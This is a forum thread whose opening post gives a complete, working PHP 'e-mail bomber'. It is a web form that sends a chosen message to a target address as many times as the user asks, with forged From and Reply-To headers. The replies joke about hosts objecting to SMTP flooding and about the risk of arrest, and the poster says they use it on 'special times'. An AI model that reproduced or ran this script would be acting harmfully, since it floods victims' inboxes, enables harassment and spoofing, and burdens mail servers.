Huh, Php e-Mail Bomber:
<?php
if ($submit == "go!"){
$extra = "From: $from\r\nReply-To: $replyto\r\n";
echo "
<table>
<tr>
<td>To:</td>
<td>$recipient</td>
</tr>
<tr>
<td>From:</td>
<td>$from</td>
</tr>
<tr>
<td>Reply-to:</td>
<td>$replyto</td>
</tr>
<tr>
<td>Subject:</td>
<td>$subject</td>
</tr>
<tr>
<td>Message:</td>
<td>$message</td>
</tr>
<tr>
<td>Number to send:</td>
<td>$number</td>
</tr>
</table>
<br>Sending... ";
for ($i = 0; $i < $number; $i++){
mail ($recipient, $subject, $message, $extra);
}
echo "done</body></html>";
}
else{
echo "
<form method='post' action='emailbomber.php'>
<table>
<tr>
<td>To:</td>
<td><input type='text' name='recipient'></input></td>
</tr>
<tr>
<td>From:</td>
<td><input type='text' name='from'></input></td>
</tr>
<tr>
<td>Reply-to:</td>
<td><input type='text' name='replyto'></input></td>
</tr>
<tr>
<td>Subject:</td>
<td><input type='text' name='subject'></input></td>
</tr>
<tr>
<td>Message:</td>
<td><input type='text' name='message'></input></td>
</tr>
<tr>
<td>Number to send:</td>
<td><input type='text' name='number'></input></td>
</tr>
</table>
<input type='submit' name='submit' value='go!'></input>
</form> ";
}
?>
Would you be running your own smtp? Most hosts would get pissed by flooding their smtp with spam :P
Well, not really lol.. I just use it on special times lol..
Wow, someone thinks they're too cool for school.
Im soooo bored..,
Hmm it isnt possible to make a php bot? right?
It's possible, but probably not the ideal language to write one in.
How would you do that, would you use ssl with php?
You'd use the sockets api.
Allot of people have told me u cant like shadowed, and he is really good at this, i told him about the sockets long time ago and he told me dont even try to :o.
Would you really want to post a bomber on a website... Might be arrested :)
I doubt you can get arrested for showing someone how something is done.
its a simple feedback form, its only harmful when you put it in a loop :P